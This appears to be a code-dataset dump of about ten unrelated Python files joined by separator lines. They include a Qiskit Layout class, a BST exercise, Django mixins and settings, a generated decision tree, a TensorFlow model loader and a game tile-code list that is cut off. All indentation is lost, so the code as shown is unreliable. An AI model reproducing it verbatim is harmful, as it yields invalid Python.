from qiskit.circuit.quantumregister import Qubit
from qiskit.transpiler.exceptions import LayoutError
from qiskit.converters import isinstanceint
class Layout():
"""Two-ways dict to represent a Layout."""
def __init__(self, input_dict=None):
"""construct a Layout from a bijective dictionary, mapping
virtual qubits to physical qubits"""
self._p2v = {}
self._v2p = {}
if input_dict is not None:
if not isinstance(input_dict, dict):
raise LayoutError("Layout constructor takes a dict")
self.from_dict(input_dict)
def __repr__(self):
"""Representation of a Layout"""
str_list = []
for key, val in self._p2v.items():
str_list.append("{k}: {v},".format(k=key, v=val))
if str_list:
str_list[-1] = str_list[-1][:-1]
return "Layout({\n" + "\n".join(str_list) + "\n})"
def from_dict(self, input_dict):
"""Populates a Layout from a dictionary.
The dictionary must be a bijective mapping between
virtual qubits (tuple) and physical qubits (int).
Args:
input_dict (dict):
e.g.::
{(QuantumRegister(3, 'qr'), 0): 0,
(QuantumRegister(3, 'qr'), 1): 1,
(QuantumRegister(3, 'qr'), 2): 2}
Can be written more concisely as follows:
* virtual to physical::
{qr[0]: 0,
qr[1]: 1,
qr[2]: 2}
* physical to virtual::
{0: qr[0],
1: qr[1],
2: qr[2]}
"""
for key, value in input_dict.items():
virtual, physical = Layout.order_based_on_type(key, value)
self._p2v[physical] = virtual
if virtual is None:
continue
self._v2p[virtual] = physical
@staticmethod
def order_based_on_type(value1, value2):
"""decides which one is physical/virtual based on the type. Returns (virtual, physical)"""
if isinstanceint(value1) and isinstance(value2, (Qubit, type(None))):
physical = int(value1)
virtual = value2
elif isinstanceint(value2) and isinstance(value1, (Qubit, type(None))):
physical = int(value2)
virtual = value1
else:
raise LayoutError('The map (%s -> %s) has to be a (Bit -> integer)'
' or the other way around.' % (type(value1), type(value2)))
return virtual, physical
def __getitem__(self, item):
if item in self._p2v:
return self._p2v[item]
if item in self._v2p:
return self._v2p[item]
raise KeyError('The item %s does not exist in the Layout' % (item,))
def __setitem__(self, key, value):
virtual, physical = Layout.order_based_on_type(key, value)
self._set_type_checked_item(virtual, physical)
def _set_type_checked_item(self, virtual, physical):
old = self._v2p.pop(virtual, None)
self._p2v.pop(old, None)
old = self._p2v.pop(physical, None)
self._v2p.pop(old, None)
self._p2v[physical] = virtual
if virtual is not None:
self._v2p[virtual] = physical
def __delitem__(self, key):
if isinstance(key, int):
del self._v2p[self._p2v[key]]
del self._p2v[key]
elif isinstance(key, Qubit):
del self._p2v[self._v2p[key]]
del self._v2p[key]
else:
raise LayoutError('The key to remove should be of the form'
' (Qubit or integer) and %s was provided' % (type(key),))
def __len__(self):
return len(self._p2v)
def copy(self):
"""Returns a copy of a Layout instance."""
layout_copy = type(self)()
layout_copy._p2v = self._p2v.copy()
layout_copy._v2p = self._v2p.copy()
return layout_copy
def add(self, virtual_bit, physical_bit=None):
"""
Adds a map element between `virtual_bit` and `physical_bit`. If `physical_bit` is not
defined, `virtual_bit` will be mapped to a new physical bit (extending the length of the
layout by one).
Args:
virtual_bit (tuple): A (qu)bit. For example, (QuantumRegister(3, 'qr'), 2).
physical_bit (int): A physical bit. For example, 3.
"""
if physical_bit is None:
physical_candidate = len(self)
while physical_candidate in self._p2v:
physical_candidate += 1
physical_bit = physical_candidate
self[virtual_bit] = physical_bit
def add_register(self, reg):
"""Adds at the end physical_qubits that map each bit in reg.
Args:
reg (Register): A (qu)bit Register. For example, QuantumRegister(3, 'qr').
"""
for bit in reg:
self.add(bit)
def get_registers(self):
"""
Returns the registers in the layout [QuantumRegister(2, 'qr0'), QuantumRegister(3, 'qr1')]
Returns:
List: A list of Register in the layout
"""
return {bit.register for bit in self.get_virtual_bits()}
def get_virtual_bits(self):
"""
Returns the dictionary where the keys are virtual (qu)bits and the
values are physical (qu)bits.
"""
return self._v2p
def get_physical_bits(self):
"""
Returns the dictionary where the keys are physical (qu)bits and the
values are virtual (qu)bits.
"""
return self._p2v
def swap(self, left, right):
"""Swaps the map between left and right.
Args:
left (tuple or int): Item to swap with right.
right (tuple or int): Item to swap with left.
Raises:
LayoutError: If left and right do not have the same type.
"""
if type(left) is not type(right):
raise LayoutError('The method swap only works with elements of the same type.')
temp = self[left]
self[left] = self[right]
self[right] = temp
def combine_into_edge_map(self, another_layout):
"""Combines self and another_layout into an "edge map".
For example::
self                 another_layout      resulting edge map
qr_1 -> 0            0 <- q_2            qr_1 -> q_2
qr_2 -> 2            2 <- q_1            qr_2 -> q_1
qr_3 -> 3            3 <- q_0            qr_3 -> q_0
The edge map is used to compose dags via, for example, compose.
Args:
another_layout (Layout): The other layout to combine.
Returns:
dict: A "edge map".
Raises:
LayoutError: another_layout can be bigger than self, but not smaller.
Otherwise, raises.
"""
edge_map = dict()
for virtual, physical in self.get_virtual_bits().items():
if physical not in another_layout._p2v:
raise LayoutError('The wire_map_from_layouts() method does not support when the'
' other layout (another_layout) is smaller.')
edge_map[virtual] = another_layout[physical]
return edge_map
def reorder_bits(self, bits):
"""Given an ordered list of bits, reorder them according to this layout.
The list of bits must exactly match the virtual bits in this layout.
Args:
bits (list[Bit]): the bits to reorder.
Returns:
List: ordered bits.
"""
order = [0] * len(bits)
# the i-th bit is now sitting in position j
for i, v in enumerate(bits):
j = self[v]
order[i] = j
return order
@staticmethod
def generate_trivial_layout(*regs):
"""Creates a trivial ("one-to-one") Layout with the registers in `regs`.
Args:
*regs (Registers): registers to include in the layout.
Returns:
Layout: A layout with all the `regs` in the given order.
"""
layout = Layout()
for reg in regs:
layout.add_register(reg)
return layout
@staticmethod
def from_intlist(int_list, *qregs):
"""Converts a list of integers to a Layout
mapping virtual qubits (index of the list) to
physical qubits (the list values).
Args:
int_list (list): A list of integers.
*qregs (QuantumRegisters): The quantum registers to apply
the layout to.
Returns:
Layout: The corresponding Layout object.
Raises:
LayoutError: Invalid input layout.
"""
if not all(isinstanceint(i) for i in int_list):
raise LayoutError('Expected a list of ints')
if len(int_list) != len(set(int_list)):
raise LayoutError('Duplicate values not permitted; Layout is bijective.')
num_qubits = sum(reg.size for reg in qregs)
# Check if list is too short to cover all qubits
if len(int_list) < num_qubits:
err_msg = 'Integer list length must equal number of qubits in circuit.'
raise LayoutError(err_msg)
out = Layout()
main_idx = 0
for qreg in qregs:
for idx in range(qreg.size):
out[qreg[idx]] = int_list[main_idx]
main_idx += 1
if main_idx != len(int_list):
for int_item in int_list[main_idx:]:
out[int_item] = None
return out
@staticmethod
def from_qubit_list(qubit_list):
"""
Populates a Layout from a list containing virtual
qubits, Qubit or None.
Args:
qubit_list (list):
e.g.: [qr[0], None, qr[2], qr[3]]
Returns:
Layout: the corresponding Layout object
Raises:
LayoutError: If the elements are not Qubit or None
"""
out = Layout()
for physical, virtual in enumerate(qubit_list):
if virtual is None:
continue
if isinstance(virtual, Qubit):
if virtual in out._v2p:
raise LayoutError('Duplicate values not permitted; Layout is bijective.')
out[virtual] = physical
else:
raise LayoutError("The list should contain elements of the Bits or NoneTypes")
return out
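# Usage sketch (illustrative, not part of the original module):
#   from qiskit import QuantumRegister
#   qr = QuantumRegister(3, 'qr')
#   layout = Layout({qr[0]: 0, qr[1]: 2, qr[2]: 1})
#   layout[qr[1]]              # -> 2
#   layout[2]                  # -> qr[1]
#   layout.swap(qr[0], qr[2])  # the two virtual bits exchange their physical positions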
|
py | b40427715c2ae389bee2ba9801bc471298a62a53 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def increasingBST(self, root: TreeNode) -> TreeNode:
if not root: return None
def inorder(node: TreeNode):
nonlocal curr
if node.left: inorder(node.left)
node.left = None
curr.right = node
curr = curr.right
if node.right: inorder(node.right)
result = curr = TreeNode(None)
inorder(root)
return result.right
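# Illustrative example (tree values assumed): the BST
#       5
#      / \
#     3   6
#    / \    \
#   2   4    8
# is rewired in in-order sequence into 2 -> 3 -> 4 -> 5 -> 6 -> 8, where every node
# keeps only a right child.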
|
py | b404299bfd91a0011c827c1801ccea0b491714a0 | from time import sleep
from zeeguu.core.model import UserActivityData
import zeeguu.core
import timeago
from datetime import datetime
import time
db_session = zeeguu.core.db.session
EVENTS_COUNT = 24
SECONDS_BETWEEN_REFRESH = 5
def most_recent_events():
return UserActivityData.query.order_by(UserActivityData.id.desc()).limit(EVENTS_COUNT)
def datetime_from_utc_to_local(utc_datetime):
now_timestamp = time.time()
offset = datetime.fromtimestamp(now_timestamp) - datetime.utcfromtimestamp(now_timestamp)
return utc_datetime + offset
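# Illustrative (assuming, say, a UTC+2 host): 10:00 UTC becomes 12:00 local time;
# the offset is simply the difference between the local and UTC interpretations of "now".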
def print_event(each):
now = datetime.now()
converted_time = datetime_from_utc_to_local(each.time)
tago = timeago.format(converted_time, now)
print(
f"{tago:>16} {str(converted_time):>28} {each.user.name:>20} {each.event:<30} {each.article_id} {each.value:<30} {each.extra_data}"
)
while True:
import os
db_session.commit()
os.system('cls' if os.name == 'nt' else 'clear')
# print(chr(27) + "[2J")
print(f"Most recent {EVENTS_COUNT} user activity events")
print(f"Refreshed every {SECONDS_BETWEEN_REFRESH} seconds")
for each in reversed(list(most_recent_events())):
print_event(each)
sleep(SECONDS_BETWEEN_REFRESH)
|
py | b4042afe59677704779871caac948ef9731612e0 | #!/usr/bin/python3
import sys
import re
for line in sys.stdin:
line = line.strip().lower()
words = re.findall(r'\w+', line)
#line = re.sub('[^\w\d\s\-]+', '', line)
#words = line.split()
for word in words:
print(f'{word}')
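# Example invocation (the script filename is an assumption):
#   $ echo "Hello world, hello!" | ./wordcount_mapper.py
#   hello
#   world
#   hello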
|
py | b4042b305d90c76f36043398522d900348880bdb | import gym
env = gym.make('Acrobot-v1')
print('Acrobot-v1:')
print(env.observation_space)
print(env.action_space)
env = gym.make('Pendulum-v1')
print('Pendulum-v1:')
print(env.observation_space)
print(env.action_space)
env = gym.make('CartPole-v1')
print('CartPole-v1:')
print(env.observation_space)
print(env.action_space)
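# Expected output for the CartPole block (standard Gym spaces; the exact bounds
# printed may differ between gym versions):
#   Box(4,) with limits around +/-4.8 for position and +/-0.418 rad for pole angle
#   Discrete(2)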
env = gym.make('MountainCar-v0')
print('MountainCar-v0')
print(env.observation_space)
print(env.action_space)
'''
env.reset()
for _ in range(1000):
env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
env = gym.make('Pendulum-v0')
env.reset()
for _ in range(1000):
env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
'''
|
py | b4042c3bccb055e3f4b99ae52081b58ca8cac7db | from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect, JsonResponse
from wye.base.constants import WorkshopStatus, FeedbackType
from wye.base.emailer import send_mail
from wye.organisations.models import Organisation
from wye.profiles.models import Profile
from wye.regions.models import RegionalLead
from .models import Workshop, WorkshopFeedBack
class WorkshopAccessMixin(object):
def dispatch(self, request, *args, **kwargs):
user = request.user
pk = self.kwargs.get(self.pk_url_kwarg, None)
workshop = Workshop.objects.get(id=pk)
is_admin = Profile.is_admin(user)
is_lead = (Profile.is_regional_lead(user) and
RegionalLead.is_regional_lead(user, workshop.location))
is_organiser = (Profile.is_organiser(user) and
user in workshop.requester.user.all())
if not (is_admin or is_lead or is_organiser):
return HttpResponseForbidden("Not sufficent permission")
return super(WorkshopAccessMixin, self).dispatch(request, *args, **kwargs)
class WorkshopFeedBackMixin(object):
"""
Restrict access to feedback url if
- Workshop is not completed
- If the user accessing the url is not presenter or
organiser
"""
def dispatch(self, request, *args, **kwargs):
pk = self.kwargs.get('pk')
workshop = Workshop.objects.get(id=pk)
user = self.request.user
if workshop.status != WorkshopStatus.COMPLETED:
raise Http404
if not (workshop.is_presenter(user) or workshop.is_organiser(user)):
raise PermissionDenied
return super(WorkshopFeedBackMixin, self).dispatch(request, *args, **kwargs)
class WorkshopRestrictMixin(object):
"""
Mixin to restrict
- For organisation to add workshop if no feedback is shared.
- For presenter to takeup workshop if no feedback is shared
"""
allow_presenter = False
def dispatch(self, request, *args, **kwargs):
self.user = request.user
self.feedback_required = []
# check if user is tutor
if Profile.is_presenter(self.user) and self.allow_presenter:
self.validate_presenter_feedback()
elif (Profile.is_organiser(self.user) and
Organisation.list_user_organisations(self.user).exists()):
# if user is from organisation
self.validate_organisation_feedback()
elif (Profile.is_regional_lead(self.user) or
Profile.is_admin(self.user)):
pass # don't restrict lead and admin
else:
raise PermissionDenied
if self.feedback_required:
return self.return_response(request)
return super(WorkshopRestrictMixin, self).dispatch(request, *args, **kwargs)
def validate_presenter_feedback(self):
workshops = Workshop.objects.filter(
presenter=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.PRESENTER
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def validate_organisation_feedback(self):
workshops = Workshop.objects.filter(
requester__user=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.ORGANISATION
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def return_response(self, request):
msg = "Please complete the feeback for %s" % (
", ".join(map(str, self.feedback_required)))
# return json for ajax request
if request.is_ajax():
return JsonResponse({"status": False, "msg": msg})
messages.error(request, msg)
return HttpResponseRedirect(reverse('workshops:workshop_list'))
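# Usage sketch (illustrative; the view name and Django's generic CreateView base
# class are assumptions, not taken from this project):
#
# class WorkshopCreateView(WorkshopRestrictMixin, generic.CreateView):
#     model = Workshop
#     allow_presenter = False   # organisers must clear pending feedback first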
class WorkshopEmailMixin(object):
def send_mail_to_presenter(self, user, context):
"""
Send email to presenter.
@param user: Is user object
@param context: Is dict of data required by email template.
"""
# Send email to presenter
return send_mail([user.email], context, self.email_dir)
def send_mail_to_group(self, context, exclude_emails=None):
"""
Send email to org/group users.
@param context: Is dict of data required by email template.
@exclude_emails: Is list of email to be excluded from
email update.
"""
if exclude_emails is None:
exclude_emails = []
# Collage POC and admin email
poc_admin_user = Profile.get_user_with_type(
user_type=['Collage POC', 'admin']
).values_list('email', flat=True)
# Org user email
org_user_emails = self.object.requester.user.filter(
is_active=True
).values_list('email', flat=True)
# all presenter if any
all_presenter_email = self.object.presenter.values_list(
'email', flat=True
)
# List of tutor who have shown interest in that location
region_interested_member = Profile.objects.filter(
interested_locations=self.object.requester.location,
usertype__slug='tutor'
).values_list('user__email', flat=True)
all_email = []
all_email.extend(org_user_emails)
all_email.extend(all_presenter_email)
all_email.extend(poc_admin_user)
all_email.extend(region_interested_member)
all_email = set(all_email)
all_email = list(all_email.difference(exclude_emails))
send_mail(all_email, context, self.email_dir)
|
py | b4042c8fd3993e7c6da544351407bfac57aae4e3 | import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', cast=bool, default=False)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
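# Example .env read by python-decouple (illustrative values only; the keys match the
# config() calls in this file):
#   SECRET_KEY=change-me
#   DEBUG=True
#   ALLOWED_HOSTS=127.0.0.1,localhost
#   CELERY_BROKER_URL=amqp://guest:guest@rabbitmq:5672//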
# Application definition
INSTALLED_APPS = [
'account.apps.AccountConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_celery_results',
'django_celery_beat',
'rssfeed.apps.RssfeedConfig',
'feed',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rss_helper.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rss_helper.wsgi.application'
""" The sqlite3 database has been commented out below and left in in case you wish to run it locally
you can uncomment it and comment out the Postgres one underneath
"""
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_ENV_DB', default='postgres'),
'USER': config('DB_ENV_POSTGRES_USER', default='postgres'),
'PASSWORD': config('DB_ENV_POSTGRES_PASSWORD', default='postgres'),
'HOST': config('DB_PORT_5432_TCP_ADDR', default='db'),
'PORT': config('DB_PORT_5432_TCP_PORT', ''),
},
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
LOGIN_REDIRECT_URL = '/my_feeds/'
CELERY_RESULT_BACKEND = 'django-db'
CELERY_BROKER_URL = config('CELERY_BROKER_URL')
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'feed_cache',
}
}
CELERY_CACHE_BACKEND = 'django-cache'
FAIL_COUNT_THRESHOLD = config('FAIL_COUNT_THRESHOLD', default=10)
|
py | b4042d45cffea77cd1979e56ac41ead53320d90f | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Coupon", "instances": 34, "metric_value": 0.9597, "depth": 1}
if obj[3]>1:
# {"feature": "Coupon_validity", "instances": 23, "metric_value": 0.9986, "depth": 2}
if obj[4]>0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.9183, "depth": 3}
if obj[5]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.994, "depth": 4}
if obj[2]<=3:
# {"feature": "Age", "instances": 8, "metric_value": 0.8113, "depth": 5}
if obj[6]<=3:
return 'False'
elif obj[6]>3:
# {"feature": "Education", "instances": 3, "metric_value": 0.9183, "depth": 6}
if obj[9]<=2:
return 'True'
elif obj[9]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[2]>3:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.5436, "depth": 3}
if obj[16]<=2:
return 'True'
elif obj[16]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=1:
# {"feature": "Education", "instances": 11, "metric_value": 0.4395, "depth": 2}
if obj[9]<=4:
return 'False'
elif obj[9]>4:
return 'True'
else: return 'True'
else: return 'False'
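# Illustrative call (the feature encoding is assumed; the values are made up):
#   findDecision([1, 0, 2, 2, 1, 0, 4, 0, 1, 3, 5, 2, 1, 1, 1, 0, 1])
# follows Coupon>1 -> Coupon_validity>0 -> Gender<=0 -> Time<=3 -> Age>3 ->
# Education>2 and returns 'False'.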
|
py | b4042e265865dbde4b45b9e88caf418580006e88 | import json
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class ModelMetadata:
def __init__(self, sensor, network, simapp_version):
self.sensor = sensor
self.network = network
self.simapp_version = simapp_version
# TODO > Action space :)
def __str__(self):
return "{} -- {} -- SIMAPP_VERSION {}".format(
self.sensor, self.network, self.simapp_version
)
def input_type(self):
# Currently only support old observation or single camera
# TODO: Check how we can do this more smart and support stereo.
input_type = None
if "observation" in self.sensor:
input_type = "observation"
elif "FRONT_FACING_CAMERA" in self.sensor:
input_type = "FRONT_FACING_CAMERA"
else:
raise Exception("Metadata contains unsupported sensor.")
return input_type
@staticmethod
def from_file(model_metadata_path: str):
"""Load a model metadata file
Args:
model_metadata_path (str): Path to the model_metadata.json file.
Raises:
Exception: If metadata cannot be loaded from the file.
Returns:
ModelMetadata: the model sensors, network type and simapp version.
"""
try:
with open(model_metadata_path, "r") as json_file:
data = json.load(json_file)
if "version" in data:
simapp_version = data["version"]
else:
simapp_version = None
if "sensor" in data:
sensor = data["sensor"]
else:
sensor = ["observation"]
simapp_version = "1.0"
if "neural_network" in data:
network = data["neural_network"]
else:
network = "DEEP_CONVOLUTIONAL_NETWORK_SHALLOW"
return ModelMetadata(sensor, network, simapp_version)
except Exception as e:
raise Exception("Error parsing model metadata: {}".format(e))
class Model:
def __init__(self, session, metadata):
self.metadata = metadata
self.session = session
def input_size(self):
input = self.get_model_input()
height = input.shape[1]
width = input.shape[2]
return (width, height)
def get_model_input(self):
ops = self.session.graph.get_operations()
# Select first operation output tensor.
return ops[0].outputs[0]
def get_model_output(self):
ops = self.session.graph.get_operations()
# Select last operation output tensor.
return ops[-1].outputs[0]
def get_model_convolutional_output(self):
# Get all convolutional ops.
ops = self.session.graph.get_operations()
conv_ops = list(filter(lambda x: "Conv2d" in x.name, ops))
# Return last conv op.
return conv_ops[-1].outputs[0]
@staticmethod
def from_file(model_pb_path: str, metadata: ModelMetadata):
"""Load the TensorFlow graph for a model.pb model file.
Args:
model_pb_path (str): Path to the model.pb file
metadata (ModelMetadata): metadata describing the model's sensors and network
Raises:
Exception: If the session cannot be loaded from the model file.
Returns:
Model: wrapper around the loaded TensorFlow session and the model metadata.
"""
try:
tf.reset_default_graph()
sess = tf.Session(
config=tf.compat.v1.ConfigProto(
allow_soft_placement=True, log_device_placement=True
)
)
with tf.io.gfile.GFile(model_pb_path, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
sess.graph.as_default()
tf.import_graph_def(graph_def, name="")
return Model(sess, metadata)
except Exception as e:
raise Exception("Could not get session for model: {}".format(e))
|
py | b4042e4329ce031cd1182b051eb035a874f06066 | import re
from dataclasses import dataclass
from collections import OrderedDict
from typing import ClassVar, Optional, TextIO
from .utils import DirectivePrefixes, split_comment, to_line, format_comment
VALID_TILE_CODES = set(
[
"alien",
"adjacent_floor",
"alien_generator",
"alienqueen",
"altar",
"ammit",
"ankh",
"anubis",
"arrow_trap",
"autowalltorch",
"babylon_floor",
"beehive_floor",
"bigspear_trap",
"bodyguard",
"bone_block",
"bunkbed",
"bush_block",
"catmummy",
"caveman",
"caveman_asleep",
"cavemanboss",
"cavemanshopkeeper",
"chain_ceiling",
"chainandblocks_ceiling",
"chair_looking_left",
"chair_looking_right",
"challenge_waitroom",
"chunk_air",
"chunk_door",
"chunk_ground",
"climbing_pole",
"clover",
"coarse_water",
"cobra",
"coffin",
"cog_floor",
"construction_sign",
"conveyorbelt_left",
"conveyorbelt_right",
"cooked_turkey",
"cookfire",
"couch",
"crate",
"crate_bombs",
"crate_parachute",
"crate_ropes",
"crocman",
"crossbow",
"crown_statue",
"crushing_elevator",
"crushtrap",
"crushtraplarge",
"cursed_pot",
"die",
"diningtable",
"dm_spawn_point",
"dog_sign",
"door",
"door_drop_held",
"door2",
"door2_secret",
"dresser",
"drill",
"duat_floor",
"eggplant_altar",
"eggplant_child",
"eggplant_door",
"elevator",
"empress_grave",
"empty",
"empty_mech",
"entrance",
"entrance_shortcut",
"excalibur_stone",
"exit",
"factory_generator",
"falling_platform",
"floor",
"floor_hard",
"forcefield",
"forcefield_top",
"fountain_drain",
"fountain_head",
"ghist_door2",
"ghist_shopkeeper",
"giant_frog",
"giant_spider",
"giantclam",
"goldbars",
"growable_climbing_pole",
"growable_vine",
"guts_floor",
"haunted_corpse",
"hermitcrab",
"honey_downwards",
"honey_upwards",
"houyibow",
"icefloor",
"idol",
"idol_floor",
"idol_hold",
"imp",
"jiangshi",
"jumpdog",
"jungle_floor",
"jungle_spear_trap",
"key",
"kingu",
"ladder",
"ladder_plat",
"lamassu",
"lamp_hang",
"landmine",
"laser_trap",
"lava",
"lavamander",
"leprechaun",
"lightarrow",
"littorch",
"litwalltorch",
"locked_door",
"lockedchest",
"madametusk",
"mantrap",
"mattock",
"merchant",
"minewood_floor",
"minewood_floor_hanging_hide",
"minewood_floor_noreplace",
"minister",
"moai_statue",
"mosquito",
"mother_statue",
"mothership_floor",
"mummy",
"mushroom_base",
"necromancer",
"nonreplaceable_babylon_floor",
"nonreplaceable_floor",
"octopus",
"oldhunter",
"olmec",
"olmecship",
"olmite",
"pagoda_floor",
"pagoda_platform",
"palace_bookcase",
"palace_candle",
"palace_chandelier",
"palace_entrance",
"palace_floor",
"palace_table",
"palace_table_tray",
"pen_floor",
"pen_locked_door",
"pillar",
"pipe",
"plasma_cannon",
"platform",
"pot",
"potofgold",
"powder_keg",
"push_block",
"quicksand",
"regenerating_block",
"robot",
"rock",
"royal_jelly",
"scorpion",
"shop_door",
"shop_item",
"shop_pagodawall",
"shop_sign",
"shop_wall",
"shop_woodwall",
"shopkeeper",
"shopkeeper_vat",
"shortcut_station_banner",
"sidetable",
"singlebed",
"sister",
"sleeping_hiredhand",
"slidingwall_ceiling",
"slidingwall_switch",
"snake",
"snap_trap",
"sorceress",
"spark_trap",
"spikes",
"spring_trap",
"stagnant_lava",
"starting_exit",
"sticky_trap",
"stone_floor",
"storage_floor",
"storage_guy",
"styled_floor",
"sunken_floor",
"surface_floor",
"surface_hidden_floor",
"telescope",
"temple_floor",
"thief",
"thinice",
"thorn_vine",
"tiamat",
"tikiman",
"timed_forcefield",
"timed_powder_keg",
"tomb_floor",
"treasure",
"treasure_chest",
"treasure_vaultchest",
"tree_base",
"turkey",
"tv",
"udjat_socket",
"ufo",
"upsidedown_spikes",
"ushabti",
"vault_wall",
"vine",
"vlad",
"vlad_floor",
"walltorch",
"wanted_poster",
"water",
"witchdoctor",
"woodenlog_trap",
"woodenlog_trap_ceiling",
"yama",
"yang",
"yeti",
"zoo_exhibit",
"cog_door", # Community tile codes -------------------------------------------------
"totem_trap", # -------#
"dustwall", # ---------#
"bat", # --------------#
"skeleton", # ---------#
"red_skeleton", # -----#
"lizard", # -----------#
"mole", # -------------#
"monkey", # -----------#
"firebug", # ----------#
"vampire", # ----------#
"osiris", # -----------#
"anubis2", # ----------#
"assassin", # ---------#
"yeti_king", # --------#
"yeti_queen", # -------#
"bee", # --------------#
"bee_queen", # --------#
"frog", # -------------#
"frog_orange", # ------#
"hundun", # -----------#
"scarab", # -----------#
"cosmic_jelly", # -----#
"ghost", # ------------#
"ghost_med_sad", # ----#
"ghost_med_happy", # --#
"ghost_small_angry", # #
"ghost_small_sad", # --#
"ghost_small_surprised", #
"ghost_small_happy", # #
"leaf", # -------------#
"udjat_key", # --------#
"tutorial_speedrun_sign", #
"tutorial_menu_sign", #
"boombox", # ----------#
"eggplant", # ---------#
"gold_bar", # ---------#
"diamond", # ----------#
"emerald", # ----------#
"sapphire", # ---------#
"ruby", # -------------#
"rope_pile", # --------#
"rope", # -------------#
"bomb_bag", # ---------#
"bomb_box", # ---------#
"giantfood", # --------#
"elixir", # -----------#
"seeded_run_unlocker", #
"specs", # ------------#
"climbing_gloves", # --#
"pitchers_mitt", # ----#
"shoes_spring", # -----#
"shoes_spike", # ------#
"paste", # ------------#
"compass", # ----------#
"compass_alien", # ----#
"parachute", # --------#
"udjat_eye", # --------#
"kapala", # -----------#
"hedjet", # -----------#
"crown", # ------------#
"eggplant_crown", # ---#
"true_crown", # -------#
"tablet", # -----------#
"bone_key", # ---------#
"playerbag", # --------#
"cape", # -------------#
"vlads_cape", # -------#
"back_jetpack", # -----#
"back_telepack", # ----#
"back_hoverpack", # ---#
"back_powerpack", # ---#
"gun_webgun", # -------#
"gun_shotgun", # ------#
"gun_freezeray", # ----#
"camera", # -----------#
"teleporter", # -------#
"boomerang", # --------#
"machete", # ----------#
"excalibur", # --------#
"excalibur_broken", # -#
"scepter", # ----------#
"clonegun", # ---------#
"shield_wooden", # ----#
"shield_metal", # -----#
"udjat_target", # -----#
"mount_rockdog", # ----#
"mount_axolotl", # ----#
"mount_qilin", # ------#
"humphead", # ---------#
"present", # ----------#
"forcefield_horizontal", #
"forcefield_horizontal_top", #
"pet_monty", # --------#
"pet_percy", # --------#
"pet_poochi", # -------#
"lion_trap", # --------#
"bomb", # -------------#
"rope_unrolled", # ----#
"cosmic_orb", # -------#
"monkey_gold", # ------#
"altar_duat", # -------#
"spikeball", # --------#
"excalibur_stone_empty", #
"cobweb", # -----------#
"eggsac", # -----------#
"eggsac_left", # --#
"eggsac_right", #
"eggsac_top", # --#
"eggsac__bottom", #
"grub", # ------------#
"spider", # ----------#
"spider_hanging", # -#
"skull_drop_trap", # -#
"lava_pot", # --------#
"proto_shopkeeper", # #
"shopkeeper_clone", # #
"tadpole", # --------#
"ghist_present", # ---#
"palace_sign", # -----#
"critter_dungbeetle", #
"critter_butterfly", ##
"critter_snail", # ---#
